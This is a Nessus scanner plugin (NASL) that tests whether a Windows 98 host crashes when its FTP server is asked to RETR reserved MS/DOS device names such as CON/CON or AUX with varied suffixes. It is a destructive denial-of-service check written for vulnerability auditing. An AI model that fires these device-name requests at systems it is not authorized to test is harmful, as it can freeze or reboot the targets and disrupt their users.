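#
# This script was written by Michel Arboi
#
# This script is a copy of http_w98_devname_dos.nasl. Putting both
# tests in the same file could have increased the run time if several
# web servers ran on the machine.
#
# See the Nessus Scripts License for details
#
# Overview: logs in to the FTP service with the credentials stored in the
# knowledge base, issues RETR requests for file names built from MS/DOS
# reserved device names, and reports a hole if the host no longer answers
# afterwards. The check is destructive (ACT_DENIAL) and exits immediately
# when safe_checks() is enabled.
#

if(description)
{
 # The title used to read "HTTP ..." (left over from the HTTP sibling this
 # file was copied from). Everything below targets FTP, so the report title
 # now says so; a wrong protocol in the title misleads whoever triages it.
 script_name("FTP Windows 98 MS/DOS device names DOS");

 # Report text. These are runtime strings and are kept exactly as they were.
 desc["english"] = " It was possible to freeze or reboot Windows by reading a MS/DOS device through FTP, using a file name like CON\CON, AUX.htm or AUX. A cracker may use this flaw to make your system crash continuously, preventing you from working properly. Solution : upgrade your system or use a FTP server that filters those names out. Risk factor : High";

 desc["francais"] = " Il a été possible de geler ou faire rebooter Windows en lisant un périphérique MS/DOS par FTP, via un nom comme CON\CON, AUX.htm ou AUX. Un pirate peut utiliser ce problème pour faire continuellement rebooter votre système, vous empêchant de travailler correctement. Solution : mettez à jour votre système ou utilisez un serveur FTP qui filtre ces noms. Facteur de risque : Elevé";

 script_description(english:desc["english"], francais:desc["francais"]);

 summary["english"] = "Crashes Windows 98";
 summary["francais"] = "Fait planter Windows 98";
 script_summary(english:summary["english"], francais:summary["francais"]);

 # Destructive category: the main body also refuses to run under safe checks.
 script_category(ACT_DENIAL);

 script_copyright("This script is Copyright (C) 2001 Michel Arboi");
 family["english"] = "Denial of Service";
 family["francais"] = "Déni de service";
 script_family(english:family["english"], francais:family["francais"]);

 # The body reads the ftp/login, ftp/password and Services/ftp KB entries;
 # presumably these dependencies are what populate them -- confirm.
 script_dependencies("find_service.nes", "ftp_anonymous.nasl");
 script_requires_ports("Services/ftp", 21);
 exit(0);
}

# The script code starts here

login = get_kb_item("ftp/login");
pass = get_kb_item("ftp/password");
# Presumably the author's debug override; left disabled.
# login = "ftp";
# pass = "testat_private";

# Nothing to do without an FTP login, and never run when safe checks are on.
if ((! login) || safe_checks()) exit(0);

start_denial();

# Reserved MS/DOS device names to request.
dev[0] = "aux";
dev[1] = "con";
dev[2] = "prn";
dev[3] = "clock$";
dev[4] = "com1";
dev[5] = "com2";
dev[6] = "lpt1";
dev[7] = "lpt2";

# Suffixes appended to each device name. "-" is a marker, not a suffix:
# it selects the "<dev>/<dev>" form in the loop below.
ext[0] = ".foo";
ext[1] = ".";
ext[2] = ". . .. ... .. .";
ext[3] = "-";

port = get_kb_item("Services/ftp");
if(!port) port = 21;

if(get_port_state(port))
{
 for (i = 0; dev[i]; i = i + 1)
 {
  d = dev[i];
  for (j = 0; ext[j]; j = j + 1)
  {
   e = ext[j];
   if (e == "-")
    name = string(d, "/", d);
   else
    name = string(d, e);

   # One fresh control connection per candidate name.
   soc = open_sock_tcp(port);
   if(soc)
   {
    if (ftp_log_in(socket:soc, user:login, pass:pass))
    {
     port2 = ftp_get_pasv_port(socket:soc);
     # Only open the data connection when a passive port was obtained;
     # previously an empty port2 was passed straight to open_sock_tcp().
     soc2 = 0;
     if (port2)
      soc2 = open_sock_tcp(port2, transport:get_port_transport(port));

     # RETR is sent whether or not the data connection opened, as before.
     req = string("RETR ", name, "\r\n");
     send(socket:soc, data:req);

     if (soc2) close(soc2);
    }
    # Close the control socket on every path. It used to be closed only
    # after a successful login, leaking one socket per failed attempt.
    close(soc);
   }
  }
 }
}

# end_denial() is taken here to tell whether the host still responds.
# NOTE(review): a transient network loss during the run would look the same
# as a crash -- confirm a positive before acting on it.
alive = end_denial();
if(!alive)
{
 security_hole(port);
 # Record the result in the KB under Host/dead.
 set_kb_item(name:"Host/dead", value:TRUE);
}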